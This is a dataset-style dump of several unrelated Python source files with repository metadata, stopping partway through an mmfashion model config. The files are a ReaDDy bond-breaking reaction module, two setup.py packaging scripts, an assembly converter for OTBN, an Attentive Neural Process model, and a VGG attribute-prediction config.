] | 1
|
2020-07-23T17:15:23.000Z
|
2020-07-23T17:15:23.000Z
|
#!/usr/bin/env python
"""Contains structural reaction classes for use in ReaDDy to declare
structural topology reactions
Classes:
BondBreaking: container for bond breaking schemes
"""
from typing import Callable
import readdy
from softnanotools.logger import Logger
logger = Logger(__name__)
class StructuralReaction:
def __init__(
self,
reaction_function,
name: str = 'reaction',
topology_type: str = 'molecule',
rate_function: Callable = lambda x: 10000.0,
):
self.name = name
self.topology_type = topology_type
self.reaction_function = reaction_function
self.rate_function = rate_function
def __call__(self, topology):
return self.reaction_function(topology)
def register(self, system: readdy.ReactionDiffusionSystem):
"""Registers the structural reaction to a given system"""
system.topologies.add_structural_reaction(
self.name,
topology_type=self.topology_type,
reaction_function=self,
rate_function=self.rate_function,
)
return
class BondBreaking:
"""Class to store different Bond Breaking structural reactions
for use in ReaDDy.
Converts bonded [reactant] topology particles to [product] particles
via [intermediate] topology particles
[intermediate] topology particles are typically created in spatial
reactions, and BondBreaking provides a mechanism and functionality
to convert these to [product] particles.
There are currently two reaction schemes:
- polymer
Generic Bond breaking with an arbitrary number of particles
in a topology
- diatomic:
Bond breaking when a topology has only two particles
Example:
```python
reaction = BondBreaking('R', 'I', 'P').polymer
...
system.topologies.add_structural_reaction(
name=reaction.name
topology_type=reaction.topology_type
reaction_function=reaction
rate_function=reaction.rate_function
)
```
It is quite easy to overwrite the `name`, `topology_type`, and
`rate_function` parameters manually, however we believe that users
may prefer storing their reaction metadata within the same class
as their reaction.
Parameters:
reactant: name of reactant topology species
intermediate: name of reactant topology species
product: name of reactant topology species
name (optional): name of reaction type
rate_function (optional): rate function for use in ReaDDy
topology_type (optional): topology to execute reaction on
Attributes:
reactant: name of reactant topology species
intermediate: name of reactant topology species
product: name of reactant topology species
name: name of reaction type
rate_function: rate function for use in ReaDDy
topology_type: topology to execute reaction on
diatomic: Bond breaking when a topology has only two particles
polymer: Bond breaking with an arbitrary number of particles
"""
def __init__(
self,
reactant,
intermediate,
product,
name: str = 'bond_breaking',
rate_function: Callable = lambda x: 10000,
topology_type: str = 'molecule',
):
# important variables
self.reactant = reactant
self.intermediate = intermediate
self.product = product
# optional variables that are useful for storage
# but not essential, and easy to override
self.name = name
self.rate_function = rate_function
self.topology_type = topology_type
@property
def diatomic(self) -> Callable:
"""Returns a bond breaking function that converts a single
diatomic molecule to two product particles. The diatomic
molecule should contain a topology particle that corresponds
to BondBreaking.intermediate"""
def fn(topology) -> readdy.StructuralReactionRecipe:
# get reaction recipe
recipe = readdy.StructuralReactionRecipe(topology)
# get the vertices of the topology
vertices = topology.get_graph().get_vertices()
# sort types (either A or B) for easier analysis
types = [topology.particle_type_of_vertex(v) for v in vertices]
# if B is present then change both particles to C
# and delete bond by using recipe.separate_vertex
if self.intermediate in types:
recipe.separate_vertex(0)
recipe.change_particle_type(vertices[0], self.product)
recipe.change_particle_type(vertices[1], self.product)
# return the configured recipe
return recipe
return StructuralReaction(
fn,
name=self.name,
topology_type=self.topology_type,
rate_function=self.rate_function
)
@property
def polymer(self) -> Callable:
def fn(topology) -> readdy.StructuralReactionRecipe:
recipe = readdy.StructuralReactionRecipe(topology)
# it is possible for there to be a lone particle in a topology
# when reactions happen very quickly, this step ensures that
# these are converted to [product] particles which are not
# topology-bound
vertices = topology.get_graph().get_vertices()
if len(vertices) == 1:
recipe.separate_vertex(0)
recipe.change_particle_type(vertices[0], self.product)
# register R-I -> P + P reaction
elif len(vertices) == 2:
types = [topology.particle_type_of_vertex(v) for v in vertices]
if self.intermediate in types:
recipe.separate_vertex(0)
recipe.change_particle_type(vertices[0], self.product)
recipe.change_particle_type(vertices[1], self.product)
# register -R-I-R- -> -R + R-R-
else:
# insert reaction
edges = topology.get_graph().get_edges()
for edge in edges:
if topology.particle_type_of_vertex(edge[0]) \
== self.intermediate:
# remove the bond and convert back to reactant
recipe.remove_edge(edge[0], edge[1])
recipe.change_particle_type(edge[0], self.reactant)
elif topology.particle_type_of_vertex(edge[1]) \
== self.intermediate:
# do the same but with the other particle
# since that is the one that is an intermediate
recipe.remove_edge(edge[0], edge[1])
recipe.change_particle_type(edge[1], self.reactant)
return recipe
return StructuralReaction(
fn,
name=self.name,
topology_type=self.topology_type,
rate_function=self.rate_function
)
if __name__ == '__main__':
import doctest
doctest.testmod()
| 36.336683
| 79
| 0.628544
|
from typing import Callable
import readdy
from softnanotools.logger import Logger
logger = Logger(__name__)
class StructuralReaction:
def __init__(
self,
reaction_function,
name: str = 'reaction',
topology_type: str = 'molecule',
rate_function: Callable = lambda x: 10000.0,
):
self.name = name
self.topology_type = topology_type
self.reaction_function = reaction_function
self.rate_function = rate_function
def __call__(self, topology):
return self.reaction_function(topology)
def register(self, system: readdy.ReactionDiffusionSystem):
system.topologies.add_structural_reaction(
self.name,
topology_type=self.topology_type,
reaction_function=self,
rate_function=self.rate_function,
)
return
class BondBreaking:
def __init__(
self,
reactant,
intermediate,
product,
name: str = 'bond_breaking',
rate_function: Callable = lambda x: 10000,
topology_type: str = 'molecule',
):
self.reactant = reactant
self.intermediate = intermediate
self.product = product
self.name = name
self.rate_function = rate_function
self.topology_type = topology_type
@property
def diatomic(self) -> Callable:
def fn(topology) -> readdy.StructuralReactionRecipe:
recipe = readdy.StructuralReactionRecipe(topology)
vertices = topology.get_graph().get_vertices()
types = [topology.particle_type_of_vertex(v) for v in vertices]
if self.intermediate in types:
recipe.separate_vertex(0)
recipe.change_particle_type(vertices[0], self.product)
recipe.change_particle_type(vertices[1], self.product)
return recipe
return StructuralReaction(
fn,
name=self.name,
topology_type=self.topology_type,
rate_function=self.rate_function
)
@property
def polymer(self) -> Callable:
def fn(topology) -> readdy.StructuralReactionRecipe:
recipe = readdy.StructuralReactionRecipe(topology)
vertices = topology.get_graph().get_vertices()
if len(vertices) == 1:
recipe.separate_vertex(0)
recipe.change_particle_type(vertices[0], self.product)
elif len(vertices) == 2:
types = [topology.particle_type_of_vertex(v) for v in vertices]
if self.intermediate in types:
recipe.separate_vertex(0)
recipe.change_particle_type(vertices[0], self.product)
recipe.change_particle_type(vertices[1], self.product)
else:
edges = topology.get_graph().get_edges()
for edge in edges:
if topology.particle_type_of_vertex(edge[0]) \
== self.intermediate:
recipe.remove_edge(edge[0], edge[1])
recipe.change_particle_type(edge[0], self.reactant)
elif topology.particle_type_of_vertex(edge[1]) \
== self.intermediate:
recipe.remove_edge(edge[0], edge[1])
recipe.change_particle_type(edge[1], self.reactant)
return recipe
return StructuralReaction(
fn,
name=self.name,
topology_type=self.topology_type,
rate_function=self.rate_function
)
if __name__ == '__main__':
import doctest
doctest.testmod()
| true
| true
|
1c491211333554359546b998ef9c6268840541d5
| 487
|
py
|
Python
|
setup.py
|
cemsbv/pygef
|
e83811744328778bbfc808424121bbf3a64e3ff1
|
[
"MIT"
] | 3
|
2021-11-10T09:44:01.000Z
|
2022-02-01T07:55:03.000Z
|
setup.py
|
cemsbv/pygef
|
e83811744328778bbfc808424121bbf3a64e3ff1
|
[
"MIT"
] | 79
|
2021-10-11T13:40:12.000Z
|
2022-03-31T10:26:47.000Z
|
setup.py
|
cemsbv/pygef
|
e83811744328778bbfc808424121bbf3a64e3ff1
|
[
"MIT"
] | 4
|
2021-11-25T13:38:30.000Z
|
2022-02-18T10:27:58.000Z
|
from setuptools import setup
exec(open("pygef/_version.py").read())
setup(
name="pygef",
version=__version__,
author="Ritchie Vink",
author_email="ritchie46@gmail.com",
url="https://github.com/cemsbv/pygef",
license="mit",
packages=["pygef", "pygef.been_jefferies", "pygef.robertson"],
install_requires=[
"polars>= 0.9.5",
"matplotlib>= 3.4.2",
"lxml==4.8.0",
],
python_requires=">=3.7",
include_package_data=True,
)
| 23.190476
| 66
| 0.616016
|
from setuptools import setup
exec(open("pygef/_version.py").read())
setup(
name="pygef",
version=__version__,
author="Ritchie Vink",
author_email="ritchie46@gmail.com",
url="https://github.com/cemsbv/pygef",
license="mit",
packages=["pygef", "pygef.been_jefferies", "pygef.robertson"],
install_requires=[
"polars>= 0.9.5",
"matplotlib>= 3.4.2",
"lxml==4.8.0",
],
python_requires=">=3.7",
include_package_data=True,
)
| true
| true
|
1c4912ab3403b34e11296fdf8cb4133a2a11c301
| 9,071
|
py
|
Python
|
convert2otbn.py
|
felixmiller/ot-dsim
|
1d33f9cac6565b85691cd905b1eb195b341ec3d2
|
[
"Apache-2.0"
] | null | null | null |
convert2otbn.py
|
felixmiller/ot-dsim
|
1d33f9cac6565b85691cd905b1eb195b341ec3d2
|
[
"Apache-2.0"
] | null | null | null |
convert2otbn.py
|
felixmiller/ot-dsim
|
1d33f9cac6565b85691cd905b1eb195b341ec3d2
|
[
"Apache-2.0"
] | 1
|
2020-07-24T06:52:36.000Z
|
2020-07-24T06:52:36.000Z
|
# Copyright lowRISC contributors.
# Licensed under the Apache License, Version 2.0, see LICENSE for details.
# SPDX-License-Identifier: Apache-2.0
import argparse
import logging
from bignum_lib.sim_helpers import ins_objects_from_asm_file
from bignum_lib.disassembler import Disassembler
from bignum_lib.instructions import ILoop
from bignum_lib.instructions_ot import IOtLoop
from bignum_lib.instructions_ot import IOtLoopi
from bignum_lib.instructions_ot import IOtJal
from bignum_lib.instructions import ICall
from bignum_lib.instructions_ot import IOtBeq
from bignum_lib.instructions_ot import IOtBne
from bignum_lib.instructions import IBranch
from bignum_lib.instructions_ot import IOtLui
from bignum_lib.instructions_ot import IOtAddi
from bignum_lib.instructions import IMovi
def handle_movi_combined(ins1, ins2):
return
def main():
logging.basicConfig(level=logging.DEBUG)
argparser = argparse.ArgumentParser(description='Dcrypto to OTBN assembly converter')
argparser.add_argument('infile', help="Input Assembly file")
argparser.add_argument('-a', '--addresses',
help='print address for each instruction',
action='store_true')
argparser.add_argument('-w', '--dmem-word-addressing',
help='use WLEN word addressing for dmem instead of byte addressing',
action='store_true')
argparser.parse_args()
args = argparser.parse_args()
try:
infile = open(args.infile)
except IOError:
print('Could not open file ' + args.infile)
exit()
"""Load binary executable from file"""
byte_addressing = not args.dmem_word_addressing
ins_objects, ctx, _ = ins_objects_from_asm_file(infile, dmem_byte_addressing=byte_addressing)
infile.close()
ins_objects_push = [0]*len(ins_objects)
ins_objects_len = [1] * len(ins_objects)
otbn_ins_obj_list = []
ignore_next = False
for idx, item in enumerate(ins_objects):
if ignore_next:
ignore_next = False
continue
# The movi instruction is a special case, since two (subsequent) instructions have to be considered together
'''
if isinstance(item, IMovi):
if idx != len(ins_objects) - 1:
if isinstance(ins_objects[idx+1], IMovi):
if item.rd == ins_objects[idx+1].rd and item.fun == ins_objects[idx+1].fun:
if item.slice != ins_objects[idx+1].slice:
# two subsequent movi instructions are adressing the same limb, one the lower 16b, one
# the upper 16b -> Handle them together to be replaced by one single combination of
# ADDI and LUI
logging.info('Combining two movi instructions (Address '
+ str(idx) + ' and ' + str(idx+1) + ').')
handle_movi_combined(item, ins_objects[idx+1])
otbn_ins_obj = item.convert_otbn(idx)
otbn_ins_obj_list.extend(otbn_ins_obj)
ignore_next = True
continue'''
otbn_ins_obj = item.convert_otbn(idx)
if otbn_ins_obj:
otbn_ins_obj_list.extend(otbn_ins_obj)
if len(otbn_ins_obj) > 1:
ins_objects_len[idx] = len(otbn_ins_obj)
ins_objects_push[idx+1:] = [i + len(otbn_ins_obj) - 1 for i in ins_objects_push[idx+1:]]
else:
otbn_ins_obj_list.append(item)
#for item in otbn_ins_obj_list:
# print(item)
# create list of new loopranges
loopranges_otbn = []
# iterate over existing loopranges and see if they have been relocated
for item in ctx.loopranges:
# we have to consider that the last instruction in a loop is now possibly longer than 1 instruction
loopranges_otbn.append(range(item[0]+ins_objects_push[item[0]], item[-1] + ins_objects_push[item[-1]] + ins_objects_len[item[-1]]-1))
# find loop instructions and adjust them
for item in loopranges_otbn:
# modify loop instructions
ins = otbn_ins_obj_list[item[0]]
if not (isinstance(ins, IOtLoopi) or isinstance(ins, IOtLoop) or isinstance(ins, ILoop)):
raise Exception("Expected loop instruction")
current_len = ins.len
new_len = len(item)
if current_len != new_len:
logging.info('Extended loop length at (new) address ' + str(item[0]) + ' by ' + str(new_len-current_len)
+ ' from ' + str(current_len) + ' to ' + str(new_len) + '.')
ins.len = new_len
# assign list with new loop ranges to context
ctx.loopranges = loopranges_otbn
# create new dictionary for labels {address:label)}
# there are no dedicated function labels in otbn format
labels_otbn = {}
for item in ctx.labels:
new_loc = ins_objects_push[item] + item
if new_loc != item:
logging.info('Relocating address of label ' + str(ctx.labels.get(item)) + ' from ' + str(item)
+ ' to ' + str(new_loc) + '.')
labels_otbn.update({new_loc:ctx.labels.get(item)})
for item in ctx.functions:
new_loc = ins_objects_push[item] + item
if new_loc != item:
logging.info('Relocating address of function ' + str(ctx.functions.get(item)) + ' from ' + str(item)
+ ' to ' + str(new_loc) + '.')
labels_otbn.update({new_loc:ctx.functions.get(item)})
# adjust branch, call and jump instructions
inv_labels = {v: k for k, v in labels_otbn.items()}
for idx,item in enumerate(otbn_ins_obj_list):
if isinstance(item, IOtBne) or isinstance(item, IOtBeq):
if not item.label:
raise Exception('No label associated with branch instruction at (new) address ' + str(idx) +
'. Cannot relocate')
# set address
item.addr = idx
new_target_addr = inv_labels.get(item.label)
new_offset = new_target_addr - item.addr
if new_offset != item.offset:
logging.info('Adjusting branch offset for branch instruction at (new) address ' + str(idx) + ' from '
+ str(item.offset) + ' to ' + str(new_offset) + ' (for label '
+ str(labels_otbn.get(new_target_addr)) + ')')
item.offset = new_offset
if isinstance(item, IBranch):
if not item.label:
raise Exception('No label associated with branch instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target = inv_labels.get(item.label)
if new_target != item.imm:
logging.info('Adjusting branch target for branch instruction at (new) address ' + str(idx) + ' from '
+ str(item.imm) + ' to ' + str(new_target) + ' (for label '
+ str(labels_otbn.get(new_target)) + ')')
item.imm = new_target
item.addr = idx
if isinstance(item, IOtJal):
if not item.label:
raise Exception('No function label associated with JAL instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target_addr = inv_labels.get(item.label)
new_offset = new_target_addr - item.addr
if new_offset != item.imm:
logging.info('Adjusting jump offset for JAL instruction at (new) address ' + str(idx) + ' from '
+ str(item.imm) + ' to ' + str(new_offset) + ' (for label '
+ str(inv_labels.get(new_target_addr)) + ')')
item.imm = new_offset
if isinstance(item, ICall):
if not item.label:
raise Exception('No function label associated with JAL instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target_addr = inv_labels.get(item.label)
if new_target_addr != item.imm:
logging.info('Adjusting jump target for CALL instruction at (new) address ' + str(idx) + ' from '
+ str(item.imm) + ' to ' + str(new_target_addr) + ' (for label '
+ str(inv_labels.get(new_target_addr)) + ')')
item.imm = new_target_addr
item.addr = idx
# assign new dictionary with {label addresses:labels} to context
ctx.labels = labels_otbn
disassembler = Disassembler.from_ins_objects_and_context(otbn_ins_obj_list, ctx)
asm_lines = disassembler.create_assembly(opt_address=args.addresses, format='otbn')
for item in asm_lines:
print(item)
if __name__ == "__main__":
main()
| 46.757732
| 141
| 0.598721
|
import argparse
import logging
from bignum_lib.sim_helpers import ins_objects_from_asm_file
from bignum_lib.disassembler import Disassembler
from bignum_lib.instructions import ILoop
from bignum_lib.instructions_ot import IOtLoop
from bignum_lib.instructions_ot import IOtLoopi
from bignum_lib.instructions_ot import IOtJal
from bignum_lib.instructions import ICall
from bignum_lib.instructions_ot import IOtBeq
from bignum_lib.instructions_ot import IOtBne
from bignum_lib.instructions import IBranch
from bignum_lib.instructions_ot import IOtLui
from bignum_lib.instructions_ot import IOtAddi
from bignum_lib.instructions import IMovi
def handle_movi_combined(ins1, ins2):
return
def main():
logging.basicConfig(level=logging.DEBUG)
argparser = argparse.ArgumentParser(description='Dcrypto to OTBN assembly converter')
argparser.add_argument('infile', help="Input Assembly file")
argparser.add_argument('-a', '--addresses',
help='print address for each instruction',
action='store_true')
argparser.add_argument('-w', '--dmem-word-addressing',
help='use WLEN word addressing for dmem instead of byte addressing',
action='store_true')
argparser.parse_args()
args = argparser.parse_args()
try:
infile = open(args.infile)
except IOError:
print('Could not open file ' + args.infile)
exit()
byte_addressing = not args.dmem_word_addressing
ins_objects, ctx, _ = ins_objects_from_asm_file(infile, dmem_byte_addressing=byte_addressing)
infile.close()
ins_objects_push = [0]*len(ins_objects)
ins_objects_len = [1] * len(ins_objects)
otbn_ins_obj_list = []
ignore_next = False
for idx, item in enumerate(ins_objects):
if ignore_next:
ignore_next = False
continue
otbn_ins_obj = item.convert_otbn(idx)
if otbn_ins_obj:
otbn_ins_obj_list.extend(otbn_ins_obj)
if len(otbn_ins_obj) > 1:
ins_objects_len[idx] = len(otbn_ins_obj)
ins_objects_push[idx+1:] = [i + len(otbn_ins_obj) - 1 for i in ins_objects_push[idx+1:]]
else:
otbn_ins_obj_list.append(item)
loopranges_otbn = []
for item in ctx.loopranges:
loopranges_otbn.append(range(item[0]+ins_objects_push[item[0]], item[-1] + ins_objects_push[item[-1]] + ins_objects_len[item[-1]]-1))
for item in loopranges_otbn:
ins = otbn_ins_obj_list[item[0]]
if not (isinstance(ins, IOtLoopi) or isinstance(ins, IOtLoop) or isinstance(ins, ILoop)):
raise Exception("Expected loop instruction")
current_len = ins.len
new_len = len(item)
if current_len != new_len:
logging.info('Extended loop length at (new) address ' + str(item[0]) + ' by ' + str(new_len-current_len)
+ ' from ' + str(current_len) + ' to ' + str(new_len) + '.')
ins.len = new_len
ctx.loopranges = loopranges_otbn
labels_otbn = {}
for item in ctx.labels:
new_loc = ins_objects_push[item] + item
if new_loc != item:
logging.info('Relocating address of label ' + str(ctx.labels.get(item)) + ' from ' + str(item)
+ ' to ' + str(new_loc) + '.')
labels_otbn.update({new_loc:ctx.labels.get(item)})
for item in ctx.functions:
new_loc = ins_objects_push[item] + item
if new_loc != item:
logging.info('Relocating address of function ' + str(ctx.functions.get(item)) + ' from ' + str(item)
+ ' to ' + str(new_loc) + '.')
labels_otbn.update({new_loc:ctx.functions.get(item)})
inv_labels = {v: k for k, v in labels_otbn.items()}
for idx,item in enumerate(otbn_ins_obj_list):
if isinstance(item, IOtBne) or isinstance(item, IOtBeq):
if not item.label:
raise Exception('No label associated with branch instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target_addr = inv_labels.get(item.label)
new_offset = new_target_addr - item.addr
if new_offset != item.offset:
logging.info('Adjusting branch offset for branch instruction at (new) address ' + str(idx) + ' from '
+ str(item.offset) + ' to ' + str(new_offset) + ' (for label '
+ str(labels_otbn.get(new_target_addr)) + ')')
item.offset = new_offset
if isinstance(item, IBranch):
if not item.label:
raise Exception('No label associated with branch instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target = inv_labels.get(item.label)
if new_target != item.imm:
logging.info('Adjusting branch target for branch instruction at (new) address ' + str(idx) + ' from '
+ str(item.imm) + ' to ' + str(new_target) + ' (for label '
+ str(labels_otbn.get(new_target)) + ')')
item.imm = new_target
item.addr = idx
if isinstance(item, IOtJal):
if not item.label:
raise Exception('No function label associated with JAL instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target_addr = inv_labels.get(item.label)
new_offset = new_target_addr - item.addr
if new_offset != item.imm:
logging.info('Adjusting jump offset for JAL instruction at (new) address ' + str(idx) + ' from '
+ str(item.imm) + ' to ' + str(new_offset) + ' (for label '
+ str(inv_labels.get(new_target_addr)) + ')')
item.imm = new_offset
if isinstance(item, ICall):
if not item.label:
raise Exception('No function label associated with JAL instruction at (new) address ' + str(idx) +
'. Cannot relocate')
item.addr = idx
new_target_addr = inv_labels.get(item.label)
if new_target_addr != item.imm:
logging.info('Adjusting jump target for CALL instruction at (new) address ' + str(idx) + ' from '
+ str(item.imm) + ' to ' + str(new_target_addr) + ' (for label '
+ str(inv_labels.get(new_target_addr)) + ')')
item.imm = new_target_addr
item.addr = idx
ctx.labels = labels_otbn
disassembler = Disassembler.from_ins_objects_and_context(otbn_ins_obj_list, ctx)
asm_lines = disassembler.create_assembly(opt_address=args.addresses, format='otbn')
for item in asm_lines:
print(item)
if __name__ == "__main__":
main()
| true
| true
|
1c49155e219f958afd05634099aa9374b7bc263b
| 3,163
|
py
|
Python
|
neural_process/anp.py
|
revsic/tf-attentive-neural-process
|
efa3bb0a9b6cfebaa3c1e025a9da00aef8d0a1e2
|
[
"MIT"
] | 4
|
2020-08-30T14:20:05.000Z
|
2021-03-23T12:53:27.000Z
|
neural_process/anp.py
|
revsic/tf-attentive-neural-process
|
efa3bb0a9b6cfebaa3c1e025a9da00aef8d0a1e2
|
[
"MIT"
] | null | null | null |
neural_process/anp.py
|
revsic/tf-attentive-neural-process
|
efa3bb0a9b6cfebaa3c1e025a9da00aef8d0a1e2
|
[
"MIT"
] | 4
|
2020-03-23T06:34:49.000Z
|
2021-10-25T23:57:24.000Z
|
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from neural_process.module.base import Encoder, Decoder, GaussianProb
class AttentiveNP:
"""Attentive Neural Process
Attributes:
z_encoder: Encoder, encoder for latent representation
z_prob: GaussianProb, latent representation to probability distribution
encoder: Encoder, context encoder with self attention
cross_encoder: Encoder, cross context encoder with querying value attention
decoder: Decoder, decoder for context and latent variable
normal_dist: GaussianProb, converter for decoded context to probability distribution
"""
def __init__(self,
z_output_sizes,
enc_output_sizes,
cross_output_sizes,
dec_output_sizes,
self_attention,
cross_attention):
"""Initializer
Args:
z_output_sizes: List[int], number of hidden units for latent representation encoder
enc_output_sizes: List[int], number of hidden units for context encoder
cross_output_sizes: List[int], number of hidden units for cross context encoder
dec_output_sizes: List[int], number of hidden units for decoder
self_attention: Callable[[tf.Tensor], tf.Tensor], self attention method
cross_attention: Callable[[tf.Tensor], tf.Tensor], cross attention method
"""
self.z_encoder = Encoder(z_output_sizes[:-1], self_attention)
self.z_prob = GaussianProb(z_output_sizes[-1],
proj=np.mean(z_output_sizes[-2:]))
self.encoder = Encoder(enc_output_sizes, self_attention, keepdims=True)
self.cross_encoder = Encoder(cross_output_sizes, cross_attention)
self.decoder = Decoder(dec_output_sizes[:-1])
self.normal_dist = GaussianProb(dec_output_sizes[-1], multivariate=True)
def __call__(self, context, query):
cx, _ = context
z_context = self.z_encoder(context, key=cx, query=cx)
z_dist, _, _ = self.z_prob(z_context)
latent = z_dist.sample()
self_attended = self.encoder(context, key=cx, query=cx)
cross_attended = self.cross_encoder(self_attended, key=cx, query=query)
context = tf.concat([latent, cross_attended], axis=-1)
context = tf.tile(tf.expand_dims(context, 1),
[1, tf.shape(query)[1], 1])
rep = self.decoder(context, query)
dist, mu, sigma = self.normal_dist(rep)
return dist, mu, sigma
def loss(self, context, query, target):
cx, _ = context
dist, _, _ = self(context, query)
log_prob = dist.log_prob(target)
log_prob = tf.reduce_sum(log_prob)
prior, _, _ = self.z_prob(self.z_encoder(context, key=cx, query=cx))
posterior, _, _ = self.z_prob(self.z_encoder([query, target], key=query, query=query))
kl = tfp.distributions.kl_divergence(prior, posterior)
kl = tf.reduce_sum(kl)
# maximize variational lower bound
loss = -log_prob + kl
return loss
| 41.077922
| 95
| 0.649067
|
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from neural_process.module.base import Encoder, Decoder, GaussianProb
class AttentiveNP:
def __init__(self,
z_output_sizes,
enc_output_sizes,
cross_output_sizes,
dec_output_sizes,
self_attention,
cross_attention):
self.z_encoder = Encoder(z_output_sizes[:-1], self_attention)
self.z_prob = GaussianProb(z_output_sizes[-1],
proj=np.mean(z_output_sizes[-2:]))
self.encoder = Encoder(enc_output_sizes, self_attention, keepdims=True)
self.cross_encoder = Encoder(cross_output_sizes, cross_attention)
self.decoder = Decoder(dec_output_sizes[:-1])
self.normal_dist = GaussianProb(dec_output_sizes[-1], multivariate=True)
def __call__(self, context, query):
cx, _ = context
z_context = self.z_encoder(context, key=cx, query=cx)
z_dist, _, _ = self.z_prob(z_context)
latent = z_dist.sample()
self_attended = self.encoder(context, key=cx, query=cx)
cross_attended = self.cross_encoder(self_attended, key=cx, query=query)
context = tf.concat([latent, cross_attended], axis=-1)
context = tf.tile(tf.expand_dims(context, 1),
[1, tf.shape(query)[1], 1])
rep = self.decoder(context, query)
dist, mu, sigma = self.normal_dist(rep)
return dist, mu, sigma
def loss(self, context, query, target):
cx, _ = context
dist, _, _ = self(context, query)
log_prob = dist.log_prob(target)
log_prob = tf.reduce_sum(log_prob)
prior, _, _ = self.z_prob(self.z_encoder(context, key=cx, query=cx))
posterior, _, _ = self.z_prob(self.z_encoder([query, target], key=query, query=query))
kl = tfp.distributions.kl_divergence(prior, posterior)
kl = tf.reduce_sum(kl)
loss = -log_prob + kl
return loss
| true
| true
|
1c4917dd6991f237429f66925e799b5c8528dfaf
| 267
|
py
|
Python
|
setup.py
|
caseyjlaw/vlass
|
f8c39401eb247f86e6bfc213133a2fd3c09ac34a
|
[
"BSD-3-Clause"
] | 1
|
2018-07-31T09:50:27.000Z
|
2018-07-31T09:50:27.000Z
|
setup.py
|
caseyjlaw/vlass
|
f8c39401eb247f86e6bfc213133a2fd3c09ac34a
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
caseyjlaw/vlass
|
f8c39401eb247f86e6bfc213133a2fd3c09ac34a
|
[
"BSD-3-Clause"
] | 1
|
2016-07-30T01:13:57.000Z
|
2016-07-30T01:13:57.000Z
|
from setuptools import setup
from version import get_git_version
setup(name='vlass_tools',
version=get_git_version(),
url='http://github.com/caseyjlaw/vlass',
packages=['vlass_tools'],
requirements=['astropy', 'numpy'],
zip_safe=False)
| 26.7
| 46
| 0.692884
|
from setuptools import setup
from version import get_git_version
setup(name='vlass_tools',
version=get_git_version(),
url='http://github.com/caseyjlaw/vlass',
packages=['vlass_tools'],
requirements=['astropy', 'numpy'],
zip_safe=False)
| true
| true
|
1c491839af56bb218361d4029760d306639504fe
| 3,521
|
py
|
Python
|
configs/category_attribute_predict/global_predictor_vgg.py
|
engahmed1190/mmfashion
|
34ba2d8a9f2daadb4a04d24287664cebde4b14f9
|
[
"Apache-2.0"
] | 3
|
2021-01-17T14:42:38.000Z
|
2022-02-27T10:31:46.000Z
|
configs/category_attribute_predict/global_predictor_vgg.py
|
engahmed1190/mmfashion
|
34ba2d8a9f2daadb4a04d24287664cebde4b14f9
|
[
"Apache-2.0"
] | null | null | null |
configs/category_attribute_predict/global_predictor_vgg.py
|
engahmed1190/mmfashion
|
34ba2d8a9f2daadb4a04d24287664cebde4b14f9
|
[
"Apache-2.0"
] | null | null | null |
import os
# model settings
arch = 'vgg'
attribute_num = 26 # num of attributes
category_num = 50 # num of categories
img_size = (224, 224)
model = dict(
type='GlobalAttrCatePredictor',
backbone=dict(type='Vgg', layer_setting='vgg16'),
global_pool=dict(
type='GlobalPooling',
inplanes=(7, 7),
pool_plane=(2, 2),
inter_channels=[512, 1024],
outchannels=1024),
attr_predictor=dict(
type='AttrPredictor',
inchannels=1024,
outchannels=attribute_num,
loss_attr=dict(
type='BCEWithLogitsLoss',
ratio=1,
weight=None,
size_average=None,
reduce=None,
reduction='mean')),
cate_predictor=dict(
type='CatePredictor',
inchannels=1024,
outchannels=category_num,
loss_cate=dict(
type='CELoss',
ratio=1,
weight=None,
reduction='mean')),
pretrained='checkpoint/vgg16.pth')
pooling = 'RoI'
# dataset settings
dataset_type = 'Attr_Pred'
data_root = 'data/Attr_Predict'
img_norm = dict(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
data = dict(
imgs_per_gpu=128,
workers_per_gpu=4,
train=dict(
type=dataset_type,
img_path=os.path.join(data_root, 'Img'),
img_file=os.path.join(data_root, 'Anno_fine/train.txt'),
label_file=os.path.join(data_root, 'Anno_fine/train_attr.txt'),
cate_file=os.path.join(data_root, 'Anno_fine/train_cate.txt'),
bbox_file=os.path.join(data_root, 'Anno_fine/train_bbox.txt'),
landmark_file=os.path.join(data_root, 'Anno_fine/train_landmarks.txt'),
img_size=img_size),
test=dict(
type=dataset_type,
img_path=os.path.join(data_root, 'Img'),
img_file=os.path.join(data_root, 'Anno_fine/test.txt'),
label_file=os.path.join(data_root, 'Anno_fine/test_attr.txt'),
cate_file=os.path.join(data_root, 'Anno_fine/test_cate.txt'),
bbox_file=os.path.join(data_root, 'Anno_fine/test_bbox.txt'),
landmark_file=os.path.join(data_root, 'Anno_fine/test_landmarks.txt'),
attr_cloth_file=os.path.join(data_root, 'Anno_fine/list_attr_cloth.txt'),
cate_cloth_file=os.path.join(data_root, 'Anno_fine/list_category_cloth.txt'),
img_size=img_size),
val=dict(
type=dataset_type,
img_path=os.path.join(data_root, 'Img'),
img_file=os.path.join(data_root, 'Anno_fine/val.txt'),
label_file=os.path.join(data_root, 'Anno_fine/val_attr.txt'),
cate_file=os.path.join(data_root, 'Anno_fine/val_cate.txt'),
bbox_file=os.path.join(data_root, 'Anno_fine/val_bbox.txt'),
landmark_file=os.path.join(data_root, 'Anno_fine/val_landmarks.txt'),
img_size=img_size))
# optimizer
optimizer = dict(type='SGD', lr=1e-3, momentum=0.9)
optimizer_config = dict()
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=0.1,
step=[10, 20])
checkpoint_config = dict(interval=1)
log_config = dict(
interval=10, hooks=[
dict(type='TextLoggerHook'),
])
start_epoch = 0
total_epochs = 50
gpus = dict(train=[0, 1], test=[0])
work_dir = 'checkpoint/CateAttrPredict/vgg/global'
print_interval = 20 # interval to print information
save_interval = 5
init_weights_from = None
load_from = None
resume_from = None
workflow = [('train', total_epochs)]
dist_params = dict(backend='nccl')
log_level = 'INFO'
| 32.302752
| 85
| 0.653792
|
import os
arch = 'vgg'
attribute_num = 26 category_num = 50 img_size = (224, 224)
model = dict(
